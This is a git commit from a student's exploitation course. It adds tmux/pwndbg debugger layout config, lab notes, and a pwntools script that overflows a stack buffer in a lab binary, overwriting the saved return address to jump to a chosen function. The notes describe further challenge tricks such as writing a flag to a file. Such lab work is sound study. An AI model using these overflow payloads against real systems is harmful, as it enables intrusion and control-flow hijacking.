lab 4a, got some nice pwndbg layout config

2025-12-06 06:54:07 +00:00 · 2024-10-10 15:09:18 -07:00 · 2024-10-10 15:09:18 -07:00 · ef2aeb2e24
commit ef2aeb2e24
parent a691485941
4 changed files with 110 additions and 0 deletions
--- a/.gdb_split.py
+++ b/.gdb_split.py
@ -0,0 +1,41 @@
 import atexit
 import os
 from pwndbg.commands.context import contextoutput, output, clear_screen
 bt = (
    os.popen('tmux split-window -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
    .read()
    .strip()
    .split(":")
 )
 st = (
    os.popen(
        f"tmux split-window -h -t {bt[0]} -P -F "
        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
    )
    .read()
    .strip()
    .split(":")
 )
 re = (
    os.popen(
        f"tmux split-window -h -t {st[0]} -P -F "
        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
    )
    .read()
    .strip()
    .split(":")
 )
 di = (
    os.popen('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
    .read()
    .strip()
    .split(":")
 )
 panes = dict(backtrace=bt, stack=st, regs=re, disasm=di)
 for sec, p in panes.items():
    contextoutput(sec, p[1], True)
 contextoutput("legend", di[1], True)
 atexit.register(
    lambda: [os.popen(f"tmux kill-pane -t {p[0]}").read() for p in panes.values()]
 )
--- a/.gdbinit
+++ b/.gdbinit
@ -0,0 +1,5 @@
 source /opt/pwndbg/gdbinit.py
 set context-stack-lines 20
 set context-sections disasm stack regs backtrace
 source ~/.gdb_split.py
--- a/4a/lab4a.py
+++ b/4a/lab4a.py
@ -0,0 +1,46 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 # This exploit template was generated via:
 # $ pwn template
 from pwn import *
 # Set up pwntools for the correct architecture
 # context.update(arch='i386')
 exe = '/challenge/run'
 # Many built-in settings can be controlled on the command-line and show up
 # in "args".  For example, to dump all data sent/received, and disable ASLR
 # for all created processes...
 # ./exploit.py DEBUG NOASLR
 def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
 # Specify your GDB script here for debugging
 # GDB will be launched if the exploit is run via e.g.
 # ./exploit.py GDB
 gdbscript = '''
 continue
 '''.format(**locals())
 #===========================================================
 #                    EXPLOIT GOES HERE
 #===========================================================
 io = start()
 unbound_buffer = 0x7ffd6f3ab780
 saved_rip = 0x7ffd6f3ab7c8
 offset = saved_rip-unbound_buffer
 target_fn = 0x401166
 payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
 io.send(payload)
 io.interactive()
--- a/Notes.md
+++ b/Notes.md
@ -356,3 +356,21 @@ done
 ### .15 - blind leading the blind
 - basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output
 ### .16 - arg wars VI - return of the hacker
 - decompiler showed set of filtered characters, quotes and backslashes are not there
 - also .17 checks for backslashes, so i assume backslashes solves this
 - but i got stuck, TA said try the 'prequels' first then come back lol
 ### lab 4a.1 - easy overflow
 - standard buffer overflow vuln
 - gdb shenanigans
 - shift-ctrl-@ inserts a null character it seems (remember for .16)
 - enough gdb, let's move to big guns - pwntools
 - checksec says no stack canary or PIE
 - all g then
 - calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location
 - get address of target function to execute
 - craft payload accordingly